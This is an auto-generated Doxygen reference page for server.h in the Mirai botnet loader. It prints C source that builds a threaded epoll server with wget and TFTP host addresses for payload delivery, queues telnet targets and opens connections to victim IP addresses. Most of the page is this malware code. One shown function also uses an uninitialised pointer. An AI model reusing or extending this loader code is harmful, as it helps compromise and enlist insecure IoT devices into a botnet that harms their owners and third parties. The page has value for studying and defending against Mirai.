Mirai: loader/src/headers/server.h File Reference
server.h File Reference
#include <sys/epoll.h>
#include "includes.h"
#include "telnet_info.h"
#include "connection.h"
Data Structures
struct server
struct server_worker
Functions
struct server * server_create (uint8_t threads, uint8_t addr_len, ipv4_t *addrs, uint32_t max_open, char *wghip, port_t wghp, char *thip)
void server_destroy (struct server *srv)
void server_queue_telnet (struct server *srv, struct telnet_info *info)
void server_telnet_probe (struct server *srv, struct telnet_info *info)
static void bind_core (int core)
static void * worker (void *arg)
static void handle_output_buffers (struct server_worker *)
static void handle_event (struct server_worker *wrker, struct epoll_event *ev)
static void * timeout_thread (void *)
Function Documentation
static void bind_core (int core) static
static void handle_event (struct server_worker * wrker, struct epoll_event * ev) static
static void handle_output_buffers (struct server_worker *) static
struct server* server_create (uint8_t threads, uint8_t addr_len, ipv4_t * addrs, uint32_t max_open, char * wghip, port_t wghp, char * thip)
Definition at line 19 of file server.c.
References server::bind_addrs, server::bind_addrs_len, server_worker::efd, server::estab_conns, free, connection::lock, server::max_open, srv, server_worker::srv, server::tftp_host_ip, server_worker::thread, server_worker::thread_id, timeout_thread(), server::to_thrd, server::wget_host_ip, server::wget_host_port, worker(), server::workers, and server::workers_len.
Referenced by main().
 {
     struct server *srv = calloc(1, sizeof (struct server));
     struct server_worker *workers = calloc(threads, sizeof (struct server_worker));
     int i;
     // Fill out the structure
     srv->bind_addrs_len = addr_len;
     srv->bind_addrs = addrs;
     srv->max_open = max_open;
     srv->wget_host_ip = wghip;
     srv->wget_host_port = wghp;
     srv->tftp_host_ip = thip;
     srv->estab_conns = calloc(max_open * 2, sizeof (struct connection *));
     srv->workers = calloc(threads, sizeof (struct server_worker));
     srv->workers_len = threads;
     if (srv->estab_conns == NULL)
     {
         printf("Failed to allocate establisted_connections array\n");
         exit(0);
     }
     // Allocate locks internally
     for (i = 0; i < max_open * 2; i++)
     {
         srv->estab_conns[i] = calloc(1, sizeof (struct connection));
         if (srv->estab_conns[i] == NULL)
         {
             printf("Failed to allocate connection %d\n", i);
             exit(-1);
         }
         pthread_mutex_init(&(srv->estab_conns[i]->lock), NULL);
     }
     // Create worker threads
     for (i = 0; i < threads; i++)
     {
         struct server_worker *wrker = &srv->workers[i];
         wrker->srv = srv;
         wrker->thread_id = i;
         if ((wrker->efd = epoll_create1(0)) == -1)
         {
             printf("Failed to initialize epoll context. Error code %d\n", errno);
             free(srv->workers);
             free(srv);
             return NULL;
         }
         pthread_create(&wrker->thread, NULL, worker, wrker);
     }
     pthread_create(&srv->to_thrd, NULL, timeout_thread, srv);
     return srv;
 }
void server_destroy (struct server * srv)
Definition at line 78 of file server.c.
References server::bind_addrs, free, and server::workers.
 {
     if (srv == NULL)
         return;
     if (srv->bind_addrs != NULL)
         free(srv->bind_addrs);
     if (srv->workers != NULL)
         free(srv->workers);
     free(srv);
 }
void server_queue_telnet (struct server * srv, struct telnet_info * info)
Definition at line 89 of file server.c.
References ATOMIC_GET, ATOMIC_INC, server::curr_open, server::max_open, and server_telnet_probe().
Referenced by main().
 {
     while (ATOMIC_GET(&srv->curr_open) >= srv->max_open)
     {
         sleep(1);
     }
     ATOMIC_INC(&srv->curr_open);
     if (srv == NULL)
         printf("srv == NULL 3\n");
     server_telnet_probe(srv, info);
 }
void server_telnet_probe (struct server * srv, struct telnet_info * info)
Definition at line 103 of file server.c.
References telnet_info::addr, ATOMIC_DEC, ATOMIC_INC, connect, connection_close(), connection_open(), server::curr_open, server::curr_worker_child, server_worker::efd, server::estab_conns, connection::fd, connection::info, server::max_open, telnet_info::port, connection::srv, srv, util_socket_and_bind(), server::workers, and server::workers_len.
Referenced by server_queue_telnet().
 {
     int fd = util_socket_and_bind(srv);
     struct sockaddr_in addr;
     struct connection *conn;
     struct epoll_event event;
     int ret;
     struct server_worker *wrker = &srv->workers[ATOMIC_INC(&srv->curr_worker_child) % srv->workers_len];
     if (fd == -1)
     {
         if (time(NULL) % 10 == 0)
         {
             printf("Failed to open and bind socket\n");
         }
         ATOMIC_DEC(&srv->curr_open);
         return;
     }
     while (fd >= (srv->max_open * 2))
     {
         printf("fd too big\n");
         conn->fd = fd;
 #ifdef DEBUG
         printf("Can't utilize socket because client buf is not large enough\n");
 #endif
         connection_close(conn);
         return;
     }
     if (srv == NULL)
         printf("srv == NULL 4\n");
     conn = srv->estab_conns[fd];
     memcpy(&conn->info, info, sizeof (struct telnet_info));
     conn->srv = srv;
     conn->fd = fd;
     connection_open(conn);
     addr.sin_family = AF_INET;
     addr.sin_addr.s_addr = info->addr;
     addr.sin_port = info->port;
     ret = connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
     if (ret == -1 && errno != EINPROGRESS)
     {
         printf("got connect error\n");
     }
     event.data.fd = fd;
     event.events = EPOLLOUT;
     epoll_ctl(wrker->efd, EPOLL_CTL_ADD, fd, &event);
 }
static void* timeout_thread (void *) static
static void* worker (void * arg) static